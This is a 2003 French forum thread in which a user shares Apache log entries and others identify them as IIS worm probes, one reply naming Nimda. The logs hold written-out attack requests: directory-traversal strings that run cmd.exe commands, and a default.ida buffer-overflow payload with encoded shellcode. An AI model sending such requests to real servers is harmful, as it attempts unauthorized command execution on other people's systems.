trucs bizarres dans log apache

Marsh Posté le 10-08-2003 à 17:02:41

Bonjour,

J'ai remarqué quelques lignes étranges dans mes logs d'Apache (win32...).
Qu'est-ce-donc ?? Un petit vicieux ??? :

81.130.173.187 - - [08/Aug/2003:15:51:35 +0200] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 313
81.130.173.187 - - [08/Aug/2003:15:51:36 +0200] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 311
81.130.173.187 - - [08/Aug/2003:15:51:40 +0200] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 321
81.130.173.187 - - [08/Aug/2003:15:51:40 +0200] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 321
81.130.173.187 - - [08/Aug/2003:15:51:41 +0200] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 335
81.130.173.187 - - [08/Aug/2003:15:51:42 +0200] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 352
81.56.162.211 - - [08/Aug/2003:19:36:24 +0200] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 404 308
213.228.21.109 - - [08/Aug/2003:21:18:27 +0200] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 313
213.228.21.109 - - [08/Aug/2003:21:18:35 +0200] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 311
81.77.156.220 - - [08/Aug/2003:22:35:49 +0200] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 404 308
81.248.119.178 - - [08/Aug/2003:23:20:02 +0200] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 404 308
81.10.4.53 - - [09/Aug/2003:09:53:45 +0200] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 200 -
81.56.192.20 - - [09/Aug/2003:11:05:34 +0200] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 313
81.56.192.20 - - [09/Aug/2003:11:05:43 +0200] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 311
81.56.192.20 - - [09/Aug/2003:11:05:52 +0200] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 321
81.56.192.20 - - [09/Aug/2003:11:06:02 +0200] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 321
81.56.192.20 - - [09/Aug/2003:11:06:11 +0200] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 335
81.56.192.20 - - [09/Aug/2003:11:06:21 +0200] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 352
81.56.192.20 - - [09/Aug/2003:11:06:31 +0200] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 352
81.56.192.20 - - [09/Aug/2003:11:06:40 +0200] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 368
81.56.192.20 - - [09/Aug/2003:11:06:50 +0200] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 334
81.56.192.20 - - [09/Aug/2003:11:07:00 +0200] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 334
81.56.192.20 - - [09/Aug/2003:11:07:10 +0200] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 334
81.56.192.20 - - [09/Aug/2003:11:07:19 +0200] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 334
81.56.192.20 - - [09/Aug/2003:11:07:29 +0200] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 318
81.56.192.20 - - [09/Aug/2003:11:07:39 +0200] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 318
81.56.192.20 - - [09/Aug/2003:11:07:48 +0200] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 335
81.56.192.20 - - [09/Aug/2003:11:07:59 +0200] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 335

Alors c'est grave docteur ?

---------------
Dénicheur de mystérieux mystères mystiques ! Sus aux moustiques ! :: Jeey - MMVII ::

Reply

Marsh Posté le 10-08-2003 à 17:02:41

Reply

Marsh Posté le 10-08-2003 à 18:38:52

non c'est juste un serveur IIS d'infecté ( encore un admin de m!#$$* )

Reply

Marsh Posté le 10-08-2003 à 18:58:03

c'est un worm qui est censé s'attaquer à IIS. Tu ne risque rien.
j'en ai 10-15 / jours des comme ça.

Reply

Marsh Posté le 10-08-2003 à 18:59:40

a la limite, fait un "net send 81.130.173.187 le texte que tu veux" pour signaler au type que son serveur est vérolé et qu'il serait temps pour lui de se mettre à jour.

Reply

Marsh Posté le 10-08-2003 à 20:16:42

Très bien, je vous remercie !
J'avais un peu peur qu'il arrive à quelquechose !

---------------
Dénicheur de mystérieux mystères mystiques ! Sus aux moustiques ! :: Jeey - MMVII ::

Reply

Marsh Posté le 10-08-2003 à 20:18:36

c'est un simple virus qui porte le doux nom de Nimbda.

Ce virus est vieux comme le monde mais on change pas une équipe qui gagne, c'est à dire des utilisateurs qui vont quand même pas fare l'effort de mettre un antivirus, sur leur windows.

Reply

trucs bizarres dans log apache

Sujets relatifs:

Leave a Replay